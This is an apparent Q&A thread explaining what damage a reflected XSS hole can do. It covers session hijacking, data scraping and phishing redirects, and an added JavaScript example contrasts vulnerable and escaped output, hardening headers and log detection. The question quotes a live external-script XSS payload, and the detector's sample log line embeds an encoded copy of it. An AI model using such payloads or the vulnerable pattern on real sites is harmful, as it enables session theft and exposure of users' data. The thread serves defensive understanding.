15

A website I visit allows this kind of attack, to be implemented with GET in the URL

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Along with many others on this page: http://ha.ckers.org/xss.html

The site requires an account (usually paid) to access that page, but still.

How serious of a concern is this? And what kind of damage could be done to the website?

I understand I'm giving you little information, but a general idea would be nice. Thanks!

(Website is operated on a large database with confidential data along with user accounts, addresses, emails and etc [no credit cards]).

Hendrik Brummermann
jn1kk

3 Answers

17

Anything you can do with javascript as the site owner can be done with an XSS attack. That includes modifying the DOM. You could replace an entire page and thus have control of all data into and out of the website. Relatively simple scripts can read cookies and forward session information. That would be like Firesheep at a distance -- impersonating a user by grabbing their access credentials.

Further, this may introduce visitors to your site to any sort of attack that affects browsers.

Jeff Ferland
  • I understand the part about cookies and sessions hijacks. But what about modifying the DOM? How does replacing a page get access to any privileged data? All data is coming through a database with (for example) PHP. – jn1kk Oct 21 '11 at 16:12
  • 2
    Anything the user sees on their browser screen is available to be read by an XSS script. If a user can see their address information when logged in, a malicious script can forward that information to another website. – Jeff Ferland Oct 21 '11 at 16:17
  • Does this mean you somehow may be able to plant the script on the website, or the script is able to jump into another user's session (not just steal session data)? – jn1kk Oct 21 '11 at 16:19
  • 7
    Sometimes XSS attacks are from the outside of the site. Those only affect one user (something passed through the URL, for example). When they're really dangerous is when they get embedded into the site. Poor processing of user comments on a discussion page can introduce an XSS attack that affects all users viewing that page. One particularly innovative one mentioned on this site is where somebody placed an XSS attack in the EXIF data of an image and loaded that to a website which displayed the EXIF data to users. – Jeff Ferland Oct 21 '11 at 16:29
  • How do XSS attacks affect other users? If it is not stored in a database or by any means at all, then can it affect other users? – Mason H. Hatfield Jan 22 '19 at 04:51
12

XSS alone doesn't do much damage, but it can easily be combined with other techniques to form powerful attack vectors. A few possibilities are:

session hijacking - Often, session cookies can be read from Javascript. Through XSS, a script can be mounted that reads a user's session ID and passes it back to the attacker (a simple yet effective method is to add an img element to the DOM, where the URL of the image carries the session ID); the attacker can then hijack an authenticated session by putting the session ID into their own session cookie.

scraping sensitive information - If a page with an XSS vulnerability contains sensitive information, a script can read it and send it to the attacker (just like the session cookie).

posting data on someone else's behalf - Through XSS, a form submit can be intercepted and modified, or even triggered, posting data without the user's consent. For example, if you can compromise a web mail client, you could hijack the 'send' button to add yourself to the list of recipients.

malicious redirecting - An XSS script can alter the URLs of any link on the page. This can be abused to, for example, send the user to a spoofed login page; instead of actually logging in, they are sending their credentials to the attacker.

social engineering - By inserting error messages, alerts, etc., you can trick users into all sorts of insecure behavior. For example, an attacker could prompt users to download and open a certain file; if the site that asks them to do so has a high level of trust with the user, chances are they will uncritically execute anything, which allows for mounting trojans and other malware.

Also note that many attack vectors work without the user consciously opening the compromised page: often, the compromised page is put into an invisible iframe somewhere else, such as a forum that the victim is likely to visit, or a page linked from somewhere else.

tdammers
  • Session hijacking is one I hadn't thought of. That can go totally undetected and opens up the Pandora's box of what the hacker can do. – Adam Grant Sep 01 '17 at 15:21
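The following is an added example and is not code from the question or from any of the answers. It ties together the point in Jeff Ferland's answer (an injected script runs with everything the site's own JavaScript can do, including reading cookies) and tdammers' list (session ID exfiltrated through an added img element, scraping what the user sees) from the site owner's side: a hypothetical search handler that reflects a GET parameter the way the asker describes, the same handler with output encoding, the cookie and Content-Security-Policy headers that cut off the cookie-reading and image-beacon paths, and a small check that flags such requests in access logs. All function names, the example.invalid host and the log lines are constructed for this example.

```javascript
// Added example, not code from the question or answers. Hypothetical helpers
// showing why a reflected GET payload renders as live script, how output
// encoding stops it, which response headers blunt the session-exfiltration
// path, and how to spot such requests in logs. Sample data is constructed.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML-encode a value before inserting it into element content or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable pattern: the query-string value is concatenated straight into the
// page, so a payload such as <SCRIPT SRC=...></SCRIPT> becomes real markup.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Fixed pattern: identical page, but the untrusted value is encoded first.
function renderSearchHardened(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Session cookie flags. HttpOnly keeps the ID out of document.cookie, so an
// injected script cannot read it and forward it via an img URL as the answer
// describes. The session id here is a constructed placeholder.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Content-Security-Policy: script-src 'self' refuses an external <SCRIPT SRC=...>,
// and img-src 'self' refuses the image-beacon channel to an attacker host.
function cspHeader() {
  return "default-src 'self'; script-src 'self'; img-src 'self'; object-src 'none'; base-uri 'self'";
}

// Defender-side check over a request path: decode the query string and report
// whether any parameter carries script markup or a javascript: URL.
function flagsReflectedScript(requestPath) {
  const qIndex = requestPath.indexOf('?');
  if (qIndex === -1) return false;
  const rawQuery = requestPath.slice(qIndex + 1);
  let decoded;
  try {
    decoded = decodeURIComponent(rawQuery.replace(/\+/g, ' '));
  } catch (e) {
    decoded = rawQuery; // malformed percent-encoding: inspect the raw text instead
  }
  return /<\s*script\b|javascript\s*:/i.test(decoded);
}

// Constructed access-log lines in combined-log shape (not from the original page).
const SAMPLE_LOG_LINES = [
  '203.0.113.5 - - [21/Oct/2011:16:12:00 +0000] "GET /search?q=firesheep HTTP/1.1" 200 512',
  '203.0.113.9 - - [21/Oct/2011:16:13:07 +0000] "GET /search?q=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fexample.invalid%2Fxss.js%3E%3C%2FSCRIPT%3E HTTP/1.1" 200 640',
  '203.0.113.9 - - [21/Oct/2011:16:14:21 +0000] "GET /profile?tab=addresses HTTP/1.1" 200 1024',
];

// Extract the request path from each log line and keep the ones that carry a payload.
function suspiciousLogLines(lines) {
  return lines.filter((line) => {
    const match = line.match(/"(?:GET|POST) (\S+) HTTP/);
    return match !== null && flagsReflectedScript(match[1]);
  });
}
```

Calling `renderSearchVulnerable` with the question's payload returns a page whose `<SCRIPT SRC=...>` the browser will fetch and run; `renderSearchHardened` returns the same text with the angle brackets encoded, which the browser displays as literal characters. The headers only reduce the blast radius: HttpOnly hides the cookie from the script, but the script can still read the rendered page and act in the user's session, which is why encoding at output remains the actual fix.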
9

There are two aspects:

  • An XSS vulnerability allows the attacker to do anything the victim is allowed to do with the system. If the victim is a member of the staff, it is likely that he or she has access to personal information such as e-mail addresses or bank details. Furthermore, such accounts may be allowed to modify content and replace it with inappropriate statements or browser exploits.

  • A successful hack may result in extremely bad press coverage. This may be far worse than the direct damage.

Hendrik Brummermann